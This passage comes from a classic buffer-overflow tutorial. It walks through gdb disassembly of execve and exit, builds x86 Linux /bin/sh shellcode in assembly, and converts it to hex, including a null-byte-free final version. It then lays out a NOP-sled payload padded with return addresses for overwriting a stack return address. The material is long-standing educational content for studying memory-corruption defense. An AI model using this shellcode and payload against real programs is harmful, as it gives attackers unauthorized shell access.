: push %ebp 0x80481e1 : mov %esp,%ebp 0x80481e3 : sub $0x8,%esp 0x80481e6 : movl $0x808dbc8,0xfffffff8(%ebp) 0x80481ed : movl $0x0,0xfffffffc(%ebp) 0x80481f4 : sub $0x4,%esp 0x80481f7 : push $0x0 # NULL 0x80481f9 : lea 0xfffffff8(%ebp),%eax # address of name 0x80481fc : push %eax 0x80481fd : pushl 0xfffffff8(%ebp) # name[0] 0x8048200 : call 0x804cab0 <__execve> 0x8048205 : add $0x10,%esp 0x8048208 : mov $0x0,%eax 0x804820d : leave 0x804820e : ret End of assembler dump. (gdb) inside execve the stack looks like ebp -> sfp ret (4)%ebp name[0] (8)%ebp name (c)%ebp NULL (4 bytes of 0) (10%ebp) and disassemble __execve to see how execve works. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x804cab0 <__execve>: push %ebp 0x804cab1 <__execve+1>: mov $0x0,%eax 0x804cab6 <__execve+6>: mov %esp,%ebp 0x804cab8 <__execve+8>: test %eax,%eax 0x804caba <__execve+10>: push %edi 0x804cabb <__execve+11>: push %ebx 0x804cabc <__execve+12>: mov 0x8(%ebp),%edi # !!! 0x804cabf <__execve+15>: je 0x804cac6 <__execve+22> 0x804cac1 <__execve+17>: call 0x0 0x804cac6 <__execve+22>: mov 0xc(%ebp),%ecx # !!! 0x804cac9 <__execve+25>: mov 0x10(%ebp),%edx # !!! 0x804cacc <__execve+28>: push %ebx 0x804cacd <__execve+29>: mov %edi,%ebx 0x804cacf <__execve+31>: mov $0xb,%eax 0x804cad4 <__execve+36>: int $0x80 0x804cad6 <__execve+38>: pop %ebx 0x804cad7 <__execve+39>: mov %eax,%ebx 0x804cad9 <__execve+41>: cmp $0xfffff000,%ebx 0x804cadf <__execve+47>: jbe 0x804caef <__execve+63> 0x804cae1 <__execve+49>: neg %ebx 0x804cae3 <__execve+51>: call 0x80484ac <__errno_location> 0x804cae8 <__execve+56>: mov %ebx,(%eax) 0x804caea <__execve+58>: mov $0xffffffff,%ebx 0x804caef <__execve+63>: mov %ebx,%eax 0x804caf1 <__execve+65>: pop %ebx 0x804caf2 <__execve+66>: pop %edi 0x804caf3 <__execve+67>: pop %ebp 0x804caf4 <__execve+68>: ret End of assembler dump. exit.c ------------------------------------------------------------------------------ #include void main() { exit(0); } ------------------------------------------------------------------------------ [aleph1]$ gcc -o exit -static exit.c [aleph1]$ gdb exit Putting all of this together, here is what the shell code should do... 1) Setup data to appear as after char *name[2]; name[0] = "/bin/sh"; // address of "/bin/sh" name[1] = NULL; // long NULL 2) Simulate the call to execve(name[0], name, NULL); | | | v v v ebx ecx edx 0xb->eax then int $0x80 a) Have the null terminated string "/bin/sh" somewhere in memory. b) Have the address of the string "/bin/sh" somewhere in memory followed by a null long word. c) Copy 0xb into the EAX register. d) Copy the address of the address of the string "/bin/sh" into the ECX register. e) Copy the address of the string "/bin/sh" into the EBX register. f) Copy the address of the null long word into the EDX register. g) Execute the int $0x80 instruction. h) Copy 0x1 into the EAX register. i) Copy 0x0 into the EBX register. j) Execute the int $0x80 instruction. jmp 0x2a # 3 bytes trick! to find address of /bin/sh popl %esi # 1 byte trick! on the stack movl %esi,0x8(%esi) # 3 bytes put the address of /bin/... in... movb $0x0,0x7(%esi) # 4 bytes null terminate /bin/... movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes call execve movl $0x1, %eax # 5 bytes call exit movl $0x0, %ebx # 5 bytes call exit int $0x80 # 2 bytes call exit call -0x2f # 5 bytes trick! esi-> .string \"/bin/sh\" # 8 bytes 7(%esi) z # 1 byte to be null termination of string 8(%esi) xxxx # 4 bytes address of "/bin/sh" 'name[0]' c(%esi) yyyy # 4 bytes NULL (long 0) 'name[1]' We still have a few problems!! Problem: This is not a string. Solution: That is easy to fix, you can examine the bytes of... shellcodeasm.c ------------------------------------------------------------------------------ void main() { __asm__(" jmp 0x2a # 3 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2f # 5 bytes .string \"/bin/sh\" # 8 bytes "); } ------------------------------------------------------------------------------ in gdb (gdb) x/bx main+3 ... Here it is as a string... "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; Problem: This has some \x00 in it. This will effectively end the string. Solution: Use some tricks to generate \x00 without actually having 0 in your code. Problem instruction: Substitute with: -------------------------------------------------------- movb $0x0,0x7(%esi) xorl %eax,%eax movl $0x0,0xc(%esi) movb %eax,0x7(%esi) movl %eax,0xc(%esi) -------------------------------------------------------- movl $0xb,%eax movb $0xb,%al -------------------------------------------------------- movl $0x1, %eax xorl %ebx,%ebx movl $0x0, %ebx movl %ebx,%eax inc %eax -------------------------------------------------------- Final shell code: "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; To use this on a particular program (os version, gcc version, software version) you would do something like... Add in \x90 to the beginning (noop) and pad the end with a return address which will land the CPU back in the string of NO-OPs. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" <----- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" | "\x80\xe8\xdc\xff\xff\xff/bin/sh" // 13 chars | "\x44\xb0\xff\xbf" | "\x44\xb0\xff\xbf" | "\x44\xb0\xff\xbf" <- hopefully one of these correctly overwrites | "\x44\xb0\xff\xbf"; <- the return address and jumps us back to ------